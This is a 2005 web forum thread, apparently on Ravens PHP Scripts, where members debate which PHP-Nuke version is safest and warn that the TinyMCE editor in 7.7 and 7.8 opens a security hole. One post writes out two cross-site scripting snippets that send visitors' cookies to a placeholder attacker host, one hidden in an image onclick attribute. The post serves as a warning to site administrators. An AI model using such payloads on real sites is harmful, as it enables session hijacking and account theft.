Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Other - Discussion
Poll
What version of PHP-Nuke would you use if you were starting all over?
6.9
18%
 18%  [ 2 ]
7.0
0%
 0%  [ 0 ]
7.4
18%
 18%  [ 2 ]
7.5
9%
 9%  [ 1 ]
7.6
36%
 36%  [ 4 ]
7.7
18%
 18%  [ 2 ]
7.8
0%
 0%  [ 0 ]
Total Votes : 11


Author Message
Dauthus
Worker
Worker



Joined: Oct 07, 2003
Posts: 211

PostPosted: Sat Jun 04, 2005 12:03 pm Reply with quote

Knowing what you know now, and taking in account all the security issues and features, what version of PHP-Nuke would you install if you had to do it all over again?

_________________
Image
Vivere disce, cogita mori 
View user's profile Send private message Visit poster's website
CurtisH
Life Cycles Becoming CPU Cycles



Joined: Mar 15, 2004
Posts: 638
Location: West Branch, MI

PostPosted: Sat Jun 04, 2005 1:31 pm Reply with quote

Easy. 6.9

All of the things I need, and none of the stuff I don't want.

_________________
Those who dream by day are cognizant of many things which escape those who dream only by night. ~Poe 
View user's profile Send private message Visit poster's website Yahoo Messenger
djmaze
Subject Matter Expert



Joined: May 15, 2004
Posts: 727
Location: http://tinyurl.com/5z8dmv

PostPosted: Sat Jun 04, 2005 7:05 pm Reply with quote

None of them all.

I would look into better systems if i started all over
 
View user's profile Send private message Visit poster's website
Raven
Site Admin/Owner



Joined: Aug 27, 2002
Posts: 17088

PostPosted: Sat Jun 04, 2005 7:38 pm Reply with quote

Review this too [ Only registered users can see links on this board! Get registered or login! ]
 
View user's profile Send private message
Dauthus







PostPosted: Sat Jun 04, 2005 7:45 pm Reply with quote

It looks like 7.5 won that one by a landslide. I noticed everyone was touting features. Most of my "features" come from the additional modules supplied by the nuke community. There are few of the "original" modules left in my version. Interesting.
 
CurtisH







PostPosted: Sat Jun 04, 2005 8:02 pm Reply with quote

Quote:

I noticed everyone was touting features. Most of my "features" come from the additional modules supplied by the nuke community.


Exactly! I agree with you completely which is why the never ending upgrade seems so ridiculous to me. Better security would be a reason for upgrading but as we have seen, security doesn't really factor in on FB's march towards a higher version number.

If it weren't for Chatserv, Raven and Bob (and many others) there wouldn't be any security.

I myself am more of a phpBB type, but really enjoy the ability to use nuke directly with it. On my site the forums get the most attention so they are my primary concern when it comes to upgrades for features, nuke on the other hand...well mine has all the features I want and need. Smile
 
christianb
Worker
Worker



Joined: Nov 24, 2004
Posts: 131
Location: Batesville, AR

PostPosted: Thu Jun 16, 2005 10:42 am Reply with quote

Well, having installed 6.9, 7.0, 7.3, 7.5, 7.6, and 7.7 patched as either upgrades (minus 6.9) or full versions (at least once). I chose 7.7 - not because of features, but because when I got 7.7, I got 7.7 patched and it pretty well ran right out of the modified box. Aside from 2-3 little problems, this has been the least problematic for me over the rest of them. Of course, with the experience I have now with fixing most of my problems, they don't seem to bother me as much. I do agree about the "features" situation, and I really don't care about those features (one I disabled altogether as seen in another post, but since 7.7 patched wasn't an option, I chose 7.7 (since mine is 7.7) - just patched. Razz
 
View user's profile Send private message Visit poster's website
64bitguy
The Mouse Is Extension Of Arm



Joined: Mar 06, 2004
Posts: 1164

PostPosted: Thu Jun 16, 2005 10:56 am Reply with quote

First and foremost, if security is a concern, you should NOT EVEN CONSIDER versions 7.7 or 7.8.

The include of the new "HTML Editor" feature creates a huge security issue that one cannot easily avoid.... In fact, an issue that can't be avoided at all, regardless if you are using "Patched" or not. Patched cannot address this particular issue.

There are also other issues relative to it being impossible to certify 7.7 or 7.8 as HTML compliant as there is no validation function for the TinyMCE HTML Editor. Again, a huge issue.

Next, as for the 7.5 being the most popular of the last pole, keep im mind, it was the latest version of the time. Today, feature wise, 7.6 may beat it out; however, for performance and security given the latest patched revisions, 6.9 may still be the best (and this coming from someone that has never used 6.9, but is using all versions from 7.0 through 7.8).

_________________
Steph Benoit
100% Section 508 and W3C HTML5 and CSS Compliant (Truly) Code, because I love compliance. 
View user's profile Send private message
christianb







PostPosted: Thu Jun 16, 2005 3:27 pm Reply with quote

Guess I should've kept my mouth shut on this one. HitsFan Smack boxing boxingself
I thought we could just voice our opinions on this.
Didn't know it would get such a reaction. Guess I'll keep my mouth shut then.
 
CurtisH







PostPosted: Thu Jun 16, 2005 5:26 pm Reply with quote

I think you may have taken that wrong. 64BitGuy is merely trying to give you a solid heads up about the awful state of the newer Nuke so that you don't put a lot of work into using it and then end up compromised by someone who is familiar with the exploits.

Keep that mouth open! Opinions are welcomed here! Smile
 
benson
Worker
Worker



Joined: May 15, 2004
Posts: 119
Location: Germany

PostPosted: Thu Jun 16, 2005 11:04 pm Reply with quote

Hi,

I do not know enought about security, but I 'want to believe' ...

Now I'm back down on 7.6 and beside the problem with the admin modules.php file (new modules are not shown anymore) it works fine.

Maybe version 8.0 will be a milestone ?

_________________
Best regards, Norbert

gebiet51.de & fellpartner.de 
View user's profile Send private message Visit poster's website
64bitguy







PostPosted: Fri Jun 17, 2005 6:32 am Reply with quote

[ Only registered users can see links on this board! Get registered or login! ]
 
christianb







PostPosted: Fri Jun 17, 2005 7:32 am Reply with quote

CurtisHancock wrote:
I think you may have taken that wrong. 64BitGuy is merely trying to give you a solid heads up about the awful state of the newer Nuke so that you don't put a lot of work into using it and then end up compromised by someone who is familiar with the exploits.

Keep that mouth open! Opinions are welcomed here! Smile
I read about what he wrote before I Installed 7.7 and actually... had very little problems with it. For me, 7.7 required the least amount of work - as I stated before I used the patched version, so that took a lot of the problems out for me.
 
64bitguy







PostPosted: Fri Jun 17, 2005 7:48 am Reply with quote

Well... Just to clarify. I wrote an extensive article about PHP-Nuke 7.7 (which also applies to Version 7.8) and in that article is strongly urge users NOT to implement that (....now "these") latest Version(s).

There are serious new problems that cannot easily be overcome and some, due to the nature of what they are, can't be overcome at all.

Just some of the reasons why NOT to use 7.7 or 7.8 are outlined in my article at: [ Only registered users can see links on this board! Get registered or login! ]

I have since discovered OTHER serious reasons why NOT to use 7.7 or 7.8 in addition to those outlined there, which I thought was a strong enough case to explain both WHY these releases made it into the public, as well as why people should use neither version.

I do think (as Curtis explained) that everyone is entitled to their opinions; however, as someone deeply involved in repairs and evolution of the solution, I'm merely pointing out the facts about the vulnerabilities as well as inherent problems from using these two versions of Nuke which are for the most part completely untested and extremely risky to use.

Just a heads up.
Steph
 
djmaze







PostPosted: Fri Jun 17, 2005 8:42 am Reply with quote

Let me explain one of the biggest security holes that occure with "wysiwyg" and why it's the biggest mistake to be a "integrated feature"

There are many ways to rome and so it is for javascript.
With javascript you could read cookies and redirect people, so for example:
Code:
top.location="my.hacksite.com/fetch.php?cookie="+document.cookie


But you think php-nuke prevents javascript as you saw the "tags not allowed" error sometimes? WRONG !!!

Thanks to TinyMCE i can do this now:
Code:
<a href="bob.html"><img src="image.gif" onclick="top.location='my.hacksite.com/fetch.php?cookie='+document.cookie;"></a>


As a html noob you will approve the message and a security hole has born.
I don't think i have to go in further detail because the message is clear.
Also this is just one example but there are many more ways.
 
64bitguy







PostPosted: Fri Jun 17, 2005 9:24 am Reply with quote

Hi DJ...

Yes, that is just one example of how to exploit the many holes in the WYSIWYG Editor, but there are other problems related to this function as well, including ZERO compliance validation leaving even more serious security and display holes.

I have talked about this in about a dozen places here at raven's but have avoided giving an example.... well.. for the obvious reason that it is a major vulnerability and why should I help the script punks?

But since people won't listen, I'm not going to edit it out, I'm merely going to point out that this is JUST ONE WAY people can hack your domain if you are using Nuke 7.7 or Nuke 7.8. Again, having some kind of validation and filtering would prevent this issue, but no such function exists for TinyMCE. It was meant to be small and fast and thus, it is what it is. The LEAST the author (FB... but many of us have other names for him) could have done is put some protections and validation tools in Nuke, but noooooooo he had to try to catch up with Mambo and have a WYSIWYG editor without thinking things through.

It's quite simply a very bad idea to use ANY version of Nuke beyond 7.6 and while I have said in other threads, I'll say it one last time!

Don't say that you were not forwarned when (NOT IF!! WHEN) you get hacked and lose all of your work and data!

Steph
 
christianb







PostPosted: Fri Jun 17, 2005 12:17 pm Reply with quote

I agree with the flaws of 7.7, that is undenyable. However, the topic was "Knowing what you know now, and taking in account all the security issues and features, what version of PHP-Nuke would you install if you had to do it all over again?" - and I answered accordingly. I personally dislike the WYSIWYG Editor TinyMCE and have it disabled where appropriate. That is one feature I can do without. If I know how to completely disable it, I will.

64bitguy wrote:
Don't say that you were not forwarned when (NOT IF!! WHEN) you get hacked and lose all of your work and data!
Watch me get hacked now. This almost feels like a borderline threat. On another note, I've already had a few failed attempts before I got 7.7 (mainly DoS) and a few that installing Sentinel put a stop to, so that makes me feel that TinyMCE was not a factor before 7.7 - If someone is wanting to hack you, and they are determined, you will get hacked - that's a fact.
 
64bitguy







PostPosted: Fri Jun 17, 2005 12:32 pm Reply with quote

Well, I can only comment that if you aren't using the TinyMCE, why would you install 7.7 or 7.8 in the first place?

The TinyMCE editor is where the major security hole is. The warning about being hacked is directly attributable to the fact that neither the default Nuke HTML tag forbidden protections, nor NukeSentinel can protect you against an exploit that is being opened like a garage door by the editor and the mainfile of Nuke itself.

Again, the only way to protect against this would be to interpret, validate and filter all incoming editor content, but as that is not being done, it is as if you didn't have any protection at all.

My comments were by no means a threat as I don't waste my time trying to attack anyone's site... I am here for just the opposite reason; however, you must understand that there are jerks out there who DO just that kind of thing. Having a gaping hole like this in security is an invitation to them and like I said, it's a common sense kind of issue. Do you really want that kind of gaping security hole in your domain?

"Knowing what I know" I would have to say, "NO!". And thus, I have done what I can to alert others so that they may come to the same conclusion. Running Nuke 7.7 or Nuke 7.8 is an extremely bad idea! Period... End of discussion.

As for my production domain, I have tons of protection including NukeSentinel and a number of other security measures and thus hackers (try as they might, and they do every single day) have never successfully penetrated my domain.... If I were to use 7.7 or 7.8, I KNOW that I would simply be making their job extremely easy and there is just no logic in employing that kind of scenario.

In closing, this is nothing like a DDOS attack. This is a security HOLE in your software. We are really talking apples and oranges in that regard. Again, with some basic protection tools like NukeSentinel, you have much less to worry about, but as this function can bypass that security, if you have 7.7 or 7.8, you should feel extremely concerned about being totally exposed security wise.

Hence, the warning!
 
christianb







PostPosted: Fri Jun 17, 2005 12:40 pm Reply with quote

If TinyMCE isn't being used, how would a hacker be able to use TinyMCE? (I am only generally speaking here - this is in no way a defensive question.)

Besides Sentinel (using 2.20) what other security software can I use on my site? (again, generally speaking)
 
64bitguy







PostPosted: Fri Jun 17, 2005 12:51 pm Reply with quote

Well, it goes back to the original issue. If you aren't using a WYSIWYG Editor with Nuke, there is no reason to run 7.7 or 7.8. Further, if you disabled that function in 7.7 or 7.8, you would also need to patch the code in 1000 places that changed accompanying code to accomodate using a WYSIWYG Editor in the first place... again, the reason why you would simply use 7.6 which is thoroughly fixed and patched (at the latest).

Finally, FB (in his infinate wisdom) re-introduced a huge number of old (and new) bugs in addition to the WYSIWYG editor problems in 7.7 and 7.8 so there are a several hundred more reasons why nobody should use either version.

To answer your question directly, if you have disabled the editor function in 7.7 or 7.8 and have completely recoded all of your tables, you obviously are not exposed to the problem.

Besides NukeSentinel, there are a variety of security measures including other 3rd party monitoring tools, security code modifications as well as mainfile alterations that can increase security. A number of these things are in development now for public release, others are employed and unreleased by webmasters.

As I do Government consulting, some of my domains go as far as having a live "Sniffer" on the wire and employ special firewalls. Generally speaking, NukeSentinel and .htaccess rules are enough to protect you in a "Shared hosting" environment as the host will employ security tools at the server level. Some people though need more.
 
Dauthus







PostPosted: Fri Jun 17, 2005 9:19 pm Reply with quote

64bitguy wrote:
Next, as for the 7.5 being the most popular of the last pole, keep im mind, it was the latest version of the time. Today, feature wise, 7.6 may beat it out; however, for performance and security given the latest patched revisions, 6.9 may still be the best (and this coming from someone that has never used 6.9, but is using all versions from 7.0 through 7.Cool.


Ok, I really, really hate to ask this Razz , but which one would you use? You never did actually say.
 
64bitguy







PostPosted: Fri Jun 17, 2005 9:44 pm Reply with quote

Well, it's really a toss-up in my mind. I mean the performance advantages are hard to ignore regarding the 6.x platform.

In my mind, many of the things introduced since (in the 7.x platforms) have been totally useless (like a groups function that doesn't have groups functionality... A points system that doesn't really do anything....) and the list goes on and on.

I personally have upgraded from 7.0 (what I actually started with) to 7.1, to 7.4 to 7.5 and then to Platinum 7.6.

At every turn, I was forced to fix 1000 things all over again. In the case of Platinum, I ended up completely rewriting it for my domain (hence why I have 1 of 2 PHP-Nuke domains that I know of on the planet that are actually 100% W3C Compliant).

The bottom line?
I would say it really depends on what you THINK that you want for features. 6.5-6.9 would probably be the very fastest and the most flexible for adding on new modules like NSN Groups and other serious feature enhancements where the "fluff" of 7.0 through 7.6 won't get into your way.

But again, I think it's all a matter of preference.

I think the three people most qualitified to break it down would be Raven, Bob Marion and Chatserv... Maybe you can checkout the other related thread or otherwise use the forums' "search" feature for their input.
 
christianb







PostPosted: Sat Jun 18, 2005 5:12 am Reply with quote

64bitguy wrote:
(hence why I have 1 of 2 PHP-Nuke domains that I know of on the planet that are actually 100% W3C Compliant).
I have actually thought about doing this myself - although I'm not as knowledgable as most, I like fixing things and I do like making things work for the better.
 
VinDSL
Life Cycles Becoming CPU Cycles



Joined: Jul 11, 2004
Posts: 614
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com

PostPosted: Sun Jun 19, 2005 3:07 am Reply with quote

Dauthus wrote:
Knowing what you know now, and taking in account all the security issues and features, what version of PHP-Nuke would you install...

I hate to be a gadfly, but I'm still running 6.5 Final, patched and mod'ed, of course. I've installed every version since 5.5, in subdomains, but the only upgrades I've actually used on my production site were 5.6, 6.0 and 6.5. All the rest were used for testing code.

As is common with probably everyone else in this thread, my site is attacked daily, but it hasn't been hacked since the beginning of the Iraq War, when my web host installed MySQL 4.X in the middle of the night without telling anyone, and the 'Persians' defaced my site. LoL! The only thing they deleted was General George S. Patton's Speech to the Third U.S. Army - no kidding! Why this bugged them enough to deface my site, only Allah knows...
[ Only registered users can see links on this board! Get registered or login! ]

Having said that, if for some reason I HAD to switch to another version of PHP-Nuke tomorrow, it would be 7.6, for the reasons listed above... Wink

_________________
.:: "The further in you go, the bigger it gets!" ::.
.:: VinDSL's Lenon.com | The Disipal Site ::. 
View user's profile Send private message Visit poster's website ICQ Number
benson







PostPosted: Sun Jun 19, 2005 10:44 am Reply with quote

Hi,

7.6 with spaw as editor is great ! It's simple to add this editor so there is no need for running 7.7 for me anymore !

Thanks for your help !
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Other - Discussion

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©